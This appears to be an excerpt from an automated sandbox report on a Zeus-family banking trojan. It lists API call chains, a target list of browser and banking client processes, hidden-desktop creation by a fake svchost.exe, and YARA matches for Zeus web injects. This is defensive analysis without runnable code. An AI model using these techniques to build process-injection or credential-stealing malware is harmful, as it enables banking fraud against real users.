Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_013F1900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_015278A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe8_2_01521900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_01513610
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026495B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_026495B0

System Summary

Source: 2.2.svchost.exe.26a3c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e440000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.11c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.79.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
